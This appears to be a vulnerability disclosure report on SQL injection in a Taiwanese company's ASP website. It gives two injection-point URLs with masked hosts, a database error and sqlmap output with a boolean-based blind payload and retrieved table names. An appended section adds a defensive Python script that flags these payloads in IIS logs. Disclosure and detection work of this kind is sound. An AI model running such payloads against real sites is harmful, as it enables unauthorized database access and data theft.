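2016-01-19: Details reported to the vendor; awaiting vendor handling
2016-01-21: Vendor confirmed; details disclosed to the vendor only
2016-01-31: Details disclosed to core white hats and experts in related fields
2016-02-10: Details disclosed to regular white hats
2016-02-20: Details disclosed to intern white hats
2016-03-06: Details disclosed to the public
成育科技股份有限公司 SQL injection (bundled report)
Injection point 1: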
http://**.**.**.**/news01.asp?news_index=74
Injection point 2:
http://**.**.**.**/product02.asp?sonclass=140
A single quote triggers an error:
Microsoft JET Database Engine 錯誤 '80040e14'
查詢運算式 'news_index=74?' 中的 語法錯誤 (少了運算元)。
/inc/zFunDBConnect.asp, 列36
Place: GET
Parameter: news_index
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: news_index=74 AND 1701=1701
---
[12:44:24] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
It runs very slowly, so I'll just prove the point.
[12:44:28] [INFO] adding words used on web page to the check list
please enter number of threads? [Enter for 1 (current)]
[12:44:29] [WARNING] running in a single-thread mode. This could take a while.
[12:44:43] [INFO] retrieved: product
[12:45:07] [INFO] retrieved: news
[12:46:14] [INFO] retrieved: company
[12:58:30] [INFO] tried 1866/3167 items (59%)
[12:58:51] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[13:02:25] [INFO] tried 2262/3167 items (71%)
[13:02:46] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[13:07:49] [INFO] tried 2807/3167 items (89%)
[13:08:10] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[13:08:26] [INFO] tried 2829/3167 items (89%)
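Added example (not part of the original report): a check a defender could run over IIS W3C logs to find requests in which the two record-id parameters named above carry anything other than digits, which covers both the single-quote probe and the boolean-based payload shown. The log lines, IP addresses and selected log fields are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Parameters the report shows being used as numeric record ids, keyed by page.
NUMERIC_PARAMS = {"/news01.asp": "news_index", "/product02.asp": "sonclass"}

# Constructed IIS W3C log excerpt (documentation-range IPs, not from the report).
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2016-01-19 12:40:01 GET /news01.asp news_index=74 192.0.2.10 200
2016-01-19 12:43:50 GET /news01.asp news_index=74%27 198.51.100.7 500
2016-01-19 12:44:20 GET /news01.asp news_index=74+AND+1701=1701 198.51.100.7 200
2016-01-19 12:44:21 GET /product02.asp sonclass=140 192.0.2.11 200
2016-01-19 12:44:30 GET /product02.asp sonclass=140%20AND%201701=1701 198.51.100.7 200
"""

def parse_w3c(text):
    """Yield one dict per request, using the #Fields directive for column names."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):
                yield dict(zip(fields, values))

def suspicious_requests(text):
    """Return (client_ip, page, decoded_value, status) for non-numeric id values."""
    hits = []
    for row in parse_w3c(text):
        param = NUMERIC_PARAMS.get(row["cs-uri-stem"].lower())
        if param is None or row["cs-uri-query"] == "-":
            continue
        # parse_qsl decodes %XX and '+', so encoded quotes and spaces are compared in clear.
        for name, value in parse_qsl(row["cs-uri-query"], keep_blank_values=True):
            if name.lower() == param and not re.fullmatch(r"\d{1,9}", value):
                hits.append((row["c-ip"], row["cs-uri-stem"], value, int(row["sc-status"])))
    return hits

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

The same digits-only rule, applied in the ASP pages before the value reaches the Jet query, rejects both request shapes at the input boundary.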
Severity: High
Vulnerability Rank: 16
Confirmed at: 2016-01-21 23:53
Thank you for the report.
None yet